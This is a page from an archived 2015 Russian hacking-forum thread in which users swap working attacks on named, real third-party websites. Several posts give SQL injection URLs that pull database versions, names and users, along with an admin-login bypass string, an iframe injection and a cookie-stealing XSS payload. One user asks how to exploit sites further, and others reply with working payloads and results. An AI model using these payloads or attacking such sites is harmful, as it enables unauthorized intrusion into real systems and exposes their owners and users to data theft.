HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 16.05.2015, 14:11
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:

1. В сообщении нет ссылки. Не видно уязвимых параметров и вектора атаки. Если перейти по редиректу, ссылка будет видна в адресной строке, но разные браузеры могут отображать некоторые символы по-своему.
2. Cсылка на эту тему передается в реферере. Возможные проблемы для форума.
3. IP-адреса тех, кто перешел по ссылке, сохраняются в логах сервера. Возможные проблемы для юзеров.
4. Рядом со своим ником советую указывать адрес, телефон и паспортные данные. Это же круто.
Понял.Спасибо за наставление.
 
Ответить с цитированием

  #42  
Старый 16.05.2015, 23:34
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eroticland.kh.ua/index.php?nav_id=1[/COLOR][/COLOR] 
 
Ответить с цитированием

  #43  
Старый 17.05.2015, 00:24
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eroticland.kh.ua/index.php?nav_id=1[/COLOR][/COLOR] 
Код HTML:
HTML:
http://www.eroticland.kh.ua/index.php?nav_id=-1%27+and+456=78+union+select+1,2,3,version%28%29,5,6+--+
5.1.73 вывод в title
 
Ответить с цитированием

  #44  
Старый 17.05.2015, 01:57
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sex.pics-land.ru/admin/[/COLOR][/COLOR] 
Код HTML:
HTML:
логин admin' or 1=1#
 
Ответить с цитированием

  #45  
Старый 17.05.2015, 18:52
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.futurefarmers.com/playshop/PJ1.php?id=-3%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14[/COLOR][/COLOR] 
ТИЦ20 PR5

5.1.72-rel14.10
 
Ответить с цитированием

  #46  
Старый 18.05.2015, 15:12
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eroticland.kh.ua/index.php?nav_id=1[/COLOR][/COLOR] 
Ковырял тот что ты первый в списке вылазил, все хотел хотя бы ксс какой-нить попробовать засунуть, в итоге ничего толкового не вышло Получилось только вот такое, веселья для или как смотреть запрещенные сайты в обход корпоротивной прокси

Код HTML:
HTML:
http://amurchik.com.ua/search/?q=%3Ciframe+src%3D%22http%3A%2F%2Fmicrosoft.com%22%3E%3C%2Fiframe%3E
 
Ответить с цитированием

  #47  
Старый 18.05.2015, 16:11
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS: http://yarmakmusic.com/admin/index.php/">alert(document.cookie)
 
Ответить с цитированием

  #48  
Старый 18.05.2015, 21:05
Babadyc
Guest
Сообщений: n/a
Провел на форуме:
6561

Репутация: 6
По умолчанию

 
Ответить с цитированием

  #49  
Старый 18.05.2015, 21:24
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

 
Ответить с цитированием

  #50  
Старый 18.05.2015, 23:54
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

http://english.fortline.ru/page.php?id=87'+and+false+union+select 1,version(),3,3,4+--+ -

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.mmpris.ru/products.php?rid=2&id=99+And+1=2+union+select 1,database(),user()#[/COLOR][/COLOR] 
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ